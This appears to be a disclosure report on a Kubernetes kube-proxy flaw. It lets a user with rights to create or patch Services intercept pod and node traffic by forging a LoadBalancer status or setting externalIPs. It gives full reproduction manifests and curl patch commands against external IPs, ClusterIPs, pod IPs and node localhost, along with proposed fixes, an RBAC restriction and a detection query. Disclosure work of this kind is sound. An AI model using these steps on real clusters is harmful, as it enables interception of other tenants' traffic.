CVSS v3.1 base score: 5.0 (Medium)
Attack Vector: NETWORK, Attack Complexity: HIGH, Privileges Required: LOW, User Interaction: NONE, Scope: UNCHANGED, Confidentiality Impact: LOW, Integrity Impact: LOW, Availability Impact: LOW
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

CVSS v2 base score: 6.0 (Medium)
Access Vector: NETWORK, Access Complexity: MEDIUM, Authentication: SINGLE, Confidentiality Impact: PARTIAL, Integrity Impact: PARTIAL, Availability Impact: PARTIAL
Vector: AV:N/AC:M/Au:S/C:P/I:P/A:P

EPSS score: 0.001 (Low), Percentile: 46.7%
I rated this vulnerability as High: the CVSS v3.0 calculator gives me 9.9, which seems way too high given that you need to be able to create services in the K8s cluster.
This report details two ways to man-in-the-middle (MITM) traffic:
a) creating a LoadBalancer service and patching the status with the attacked IP
b) creating a ClusterIP service with ExternalIPs set to the attacked IP
For these two options, we explore four targets: an external IP, the ClusterIP of another in-cluster service, a pod (endpoint) IP, and localhost on the nodes.
This gives us 8 test cases, which I tested with kube-proxy in IPVS mode, in iptables mode, and on a GKE cluster (if you need an easier repro than kubespray deployments).
Results are: {F669473}
v1.16.3 deployed using kubespray
1.15.4-gke.22 for the GKE cluster
Test cluster deployed on top of CentOS7 using kubespray v2.12.0
container_manager: containerd
etcd_deployment_type: host
kube_proxy_mode: ipvs OR kube_proxy_mode: iptables
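To double-check which mode kube-proxy is actually running in, a quick sketch (assuming the cluster uses the standard kube-proxy ConfigMap in kube-system, as kubeadm/kubespray deployments do; GKE configures kube-proxy differently):
# print the configured proxy mode from the kube-proxy ConfigMap
kubectl -n kube-system get configmap kube-proxy -o yaml | grep -E '^[[:space:]]*mode:'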
# kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
etienne-ks141 Ready master 48m v1.16.3 10.10.52.141 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks142 Ready master 47m v1.16.3 10.10.52.142 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks143 Ready <none> 45m v1.16.3 10.10.52.143 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
etienne-ks144 Ready <none> 45m v1.16.3 10.10.52.144 <none> CentOS Linux 7 (Core) 3.10.0-1062.9.1.el7.x86_64 containerd://1.2.10
Calico 3.7.3
CNI plugin 0.8.1
We assume that you already have a working k8s cluster
Deploy a "victim-client" pod to simulate an in-cluster HTTP client with curl
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: victim-client
spec:
  containers:
  - name: curl
    image: curlimages/curl:7.67.0
    command: [ "/bin/sleep", "3600" ]
EOF
Check that we have access to our external victim (here 1.1.1.1)
# from a node
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# from the pod
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Deploy our "mitm pod"
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Namespace
metadata:
  name: kubeproxy-mitm
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: echoserver
  namespace: kubeproxy-mitm
spec:
  replicas: 1
  selector:
    matchLabels:
      app: echoserver
  template:
    metadata:
      labels:
        app: echoserver
    spec:
      containers:
      - image: gcr.io/google_containers/echoserver:1.10
        name: echoserver
        ports:
        - name: http
          containerPort: 8080
        - name: https
          containerPort: 8443
EOF
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-external-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"1.1.1.1"}]}}}'
pkill kubectl
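Note: kubectl proxy is only needed here because kubectl of this era cannot write the status subresource directly; with kubectl v1.24+ the same status patch can be applied in one command (a sketch of the equivalent call):
kubectl -n kubeproxy-mitm patch svc mitm-external-lb --subresource=status --type=merge -p '{"status":{"loadBalancer":{"ingress":[{"ip":"1.1.1.1"}]}}}'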
After the patch call, the LoadBalancer IP is properly configured (i.e. no longer pending):
kubectl get -n kubeproxy-mitm svc/mitm-external-lb
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# mitm-external-lb LoadBalancer 10.233.53.58 1.1.1.1 80:31475/TCP,443:31258/TCP 47s
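To see why traffic to 1.1.1.1 is now hijacked, you can inspect what kube-proxy programmed on a node. A sketch, assuming ipvsadm is installed on the node:
# IPVS mode: the victim IP is bound to the kube-ipvs0 dummy interface and gets a virtual server
ip addr show kube-ipvs0 | grep 1.1.1.1
ipvsadm -Ln | grep -A 2 1.1.1.1
# iptables mode: the victim IP is matched by kube-proxy's KUBE-SERVICES rules
iptables-save | grep 1.1.1.1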
Test if the MITM works
# node -> ip
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# pod -> ip
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-external-lb
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-external-eip
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: http
    port: 80
    targetPort: 8080
  - name: https
    port: 443
    targetPort: 8443
  selector:
    app: echoserver
  type: ClusterIP
  externalIPs:
  - 1.1.1.1  # the attacked external IP
EOF
Test if the MITM works
# node -> ip
curl -sv http://1.1.1.1
curl -sv https://1.1.1.1 -k
# pod -> ip
kubectl exec victim-client -- curl -sv http://1.1.1.1
kubectl exec victim-client -- curl -sv https://1.1.1.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-external-eip
Find a service to attack; in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 87m
Test if the service is working
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-service-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-service-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"10.233.36.240"}]}}}'
pkill kubectl
Test if the MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-service-lb
Find a service to attack; in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 87m
Test if the service is working before the MITM
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-service-eip
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: ClusterIP
  externalIPs:
  - 10.233.36.240  # the attacked service's ClusterIP
EOF
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-service-eip
Find a service to attack and its endpoints; in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 42m
kubectl get -n kube-system endpoints kubernetes-dashboard
# NAME ENDPOINTS AGE
# kubernetes-dashboard 10.233.115.2:8443 9h
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-pod-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  - name: https2
    port: 8443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-pod-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"10.233.115.2"}]}}}'
pkill kubectl
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
# node -> endpoint
curl -sv https://10.233.115.2:8443 -k
# pod -> endpoint
kubectl exec victim-client -- curl -sv https://10.233.115.2:8443 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-pod-lb
Find a service to attack and its endpoints; in my testing I chose kubernetes-dashboard
kubectl get -n kube-system svc/kubernetes-dashboard
# NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
# kubernetes-dashboard ClusterIP 10.233.36.240 <none> 443/TCP 42m
kubectl get -n kube-system endpoints kubernetes-dashboard
# NAME ENDPOINTS AGE
# kubernetes-dashboard 10.233.115.2:8443 9h
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-pod-eip
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  - name: https2
    port: 8443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: ClusterIP
  externalIPs:
  - 10.233.115.2  # the attacked pod (endpoint) IP
EOF
Test if MITM works
# node -> clusterIP
curl -sv https://10.233.36.240 -k
# pod -> clusterIP
kubectl exec victim-client -- curl -sv https://10.233.36.240 -k
# node -> endpoint
curl -sv https://10.233.115.2:8443 -k
# pod -> endpoint
kubectl exec victim-client -- curl -sv https://10.233.115.2:8443 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-pod-eip
(This might also work against a container with hostNetwork=true)
Deploy the MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-local-lb
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: smtp
    port: 25
    protocol: TCP
    targetPort: 8080
  - name: http
    port: 80
    protocol: TCP
    targetPort: 8080
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: LoadBalancer
EOF
kubectl proxy --port=8080 &
sleep 3
curl -k -v -XPATCH -H "Accept: application/json" -H "Content-Type: application/merge-patch+json" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-local-lb/status' -d '{"status":{"loadBalancer":{"ingress":[{"ip":"127.0.0.1"}]}}}'
pkill kubectl
On my CentOS 7 nodes, postfix is listening on 127.0.0.1:25 (hence the test with port 25)
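To confirm what is actually listening locally on a node before and after the hijack, a quick sketch (ss needs root to show process names):
ss -tlnp | grep ':25 '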
Test if the MITM works
curl http://127.0.0.1:25
curl http://127.0.0.1
curl https://127.0.0.1 -k
Cleanup
kubectl delete -n kubeproxy-mitm svc/mitm-local-lb
Try to deploy our MITM
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: mitm-local-eip
  namespace: kubeproxy-mitm
spec:
  ports:
  - name: https
    port: 443
    protocol: TCP
    targetPort: 8443
  selector:
    app: echoserver
  type: ClusterIP
  externalIPs:
  - 127.0.0.1  # loopback: rejected by API validation (see below)
EOF
This one fails with
The Service "mitm-local-eip" is invalid: spec.externalIPs[0]: Invalid value: "127.0.0.1": may not be in the loopback range (127.0.0.0/8)
This work doesn't claim to be exhaustive; here are some limitations and possible fixes:
Issues 2/3/4 (MITM of another service's ClusterIP, of a pod IP, and of localhost) could be fixed via a blacklist approach: at the API level, loadBalancerIP and externalIPs must not be allowed to fall in the same ranges as ClusterIPs, pod IPs, localhost, node IPs, and maybe some other reserved ranges.
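Independently of an API-level fix, operators can audit existing services for suspicious use of these fields. A minimal detection sketch, assuming jq is available:
# list every service that sets externalIPs or carries a loadBalancer ingress entry
kubectl get svc --all-namespaces -o json \
  | jq -r '.items[]
      | select(.spec.externalIPs != null or .status.loadBalancer.ingress != null)
      | "\(.metadata.namespace)/\(.metadata.name) externalIPs=\(.spec.externalIPs) lbIngress=\(.status.loadBalancer.ingress)"'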
Issues 1a/1b (MITM of an external IP) are expected behaviour in my opinion: I want to be able to reach my LoadBalancer IP from my pods and nodes, so a possible fix here would be a whitelist, with only real LB controllers given the rights to update it.
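One way to implement the "only real LB controllers" part today is RBAC on the services/status subresource, so ordinary users cannot forge a LoadBalancer status at all. A sketch; the cloud-lb-controller service account name is hypothetical, and this only helps if no other role already grants write access to services or services/status:
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: lb-status-writer
rules:
- apiGroups: [""]
  resources: ["services/status"]
  verbs: ["get", "patch", "update"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: lb-status-writer
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: lb-status-writer
subjects:
- kind: ServiceAccount
  name: cloud-lb-controller   # hypothetical: the real LB controller's service account
  namespace: kube-system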
We also need to make sure we can't use the same IP as both LoadBalancer IP and external IP.
Both kube-proxy configs are attached.
Command line to create the test GKE cluster:
gcloud beta container --project "my-project" clusters create "kubeproxy-tests" --zone "us-central1-a" --no-enable-basic-auth --cluster-version "1.15.4-gke.22" --machine-type "n1-standard-2" --image-type "COS" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --no-enable-ip-alias --network "projects/copper-frame-263204/global/networks/default" --subnetwork "projects/copper-frame-263204/regions/us-central1/subnetworks/default" --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair
For GKE I used "metrics-server" instead of "kubernetes-dashboard" as victim service
An attacker able to create and/or patch services can, depending on the mode of kube-proxy, man-in-the-middle traffic from pods and nodes to external IPs, to the ClusterIPs of other services, to pod IPs, and even to localhost on the nodes (see the test cases above).